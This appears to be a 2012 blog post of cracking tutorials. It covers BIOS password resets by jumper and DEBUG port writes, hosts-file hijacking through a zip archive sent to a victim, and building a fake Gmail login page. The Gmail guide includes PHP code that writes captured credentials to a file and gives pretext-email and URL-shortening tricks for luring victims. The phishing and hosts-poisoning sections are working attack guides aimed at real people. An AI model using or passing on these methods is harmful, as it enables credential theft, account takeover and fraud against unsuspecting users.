Saturday, 28 April 2012

How to crack or Reset BIOS Password? ~Cracking Tutorials

Bios password is usually used to protect the user's BIOS settings on the computer. If you want to reset the password on the BIOS does not need to bother to connect bateray CMOSnya, with a little trick on the Dos you can reset the BIOS password on it in 2 ways:

1. Clear CMOS
This way I consider the most ancient and most easy to break down the password on the BIOS. The steps are easy, first open the casing cover computer CPU. Then find the bios battery that looks something like the battery just a little more big clock. After the meet and consider the area around the battery there is usually a jumper with 3 pins, 2 pins and 1 pin not connected. 

Suppose the three pins with the code 1 - 2 - 3. Connector that connects the initial position usually is 2-3. To reset the bios do I move the position of the plug that connects pins 2-3 to position 1-2 for about 5 seconds. Then plug it back into the starting position (2-3). Try restarting the computer back on, secured the bios password is gone. 

If the above looks complicated, is easy to clear cmos by unplugging the BIOS battery and then put it back. But with the consequences of removing the label is the warranty on the battery BIOS.

2. Through DOS 

First out of the windows with me restart your computer, start the computer in MS-DOS mode, use the option "Command Prompt Only" 

At c: prompt, type: DEBUG 
press enter. You will see the sign (-) at the DEBUG prompt, then type: 
o 70 2e 
at the DEBUG prompt will be displayed as-o 70 2e. 
press enter and type: 
-O 71 ff 
press enter, the last type: 

hit enter, then you will get out of the DEBUG prompt and return to the C:> prompt. 
Now restart your COMPUTER, and see the results 
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How To set up Your own server

How To set up Your own server?
  Download the  Webserver softwares like WAMP,XAMP(Both are open source software, I meant they are free ).  My suggestion is WAMP.  Because it is my favorite one.  It is easy to use.

Downlad the wamp server from

Install the WAMP server.  After installation completed, Go to this folder path:
And paste your phishing web page here.

Start the Wamp Server.
(Start->windows->All Programs->Wamp Server->start wamp server)

you can see the half circle icon(wamp server icon) in system tray(i mean near to the time). Click the icon and select the start all services.

Now type your ip address in address bar of the web browser and hit enter. If you don't know your ip address ,visit

Now you can see your Phishing web page in your Browser.

Modifying the Host file :
 Copy the Host file from this path "C:\WINDOWS\system32\drivers\etc" to desktop.  Right click on the host file and open with Notepad.

You can see the localhost entry there.
Below that type as :
your_ip     domain_name
For eg:
 Save the File.

Compress the Host File:

    Compress hosts file such that when victim opens it, it automatically gets copied to default 
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.
Right click on the Hosts file and select the Add to archieve option.  Now follow the steps which is shown in picture:

Now send the zipped file to victim.  If he extract the zip file, then the hosts file will be replaced.
You are done.  Now whenever he try to visit the genuine or original website, the phishing webpage only will be shown.
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How to create fake or Phishing web page for gmail

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

 Upload those image to tinypic or  copy the url of each image.

Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5: 
Search for the


Replace it with 

action="http://yoursite urlhere/login.php"

 save the file.
Now you need to create login.php
 so you need to open the notepad and type as
header("Location: ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these, or 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: .  find best secure connection site.

Step 8: 
create an email with gmail keyword.
 like :

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.

For user to believe change Your phishing web page url with any of free short url sites. 
Like :,, 
This will make users to believe that it is correct url.
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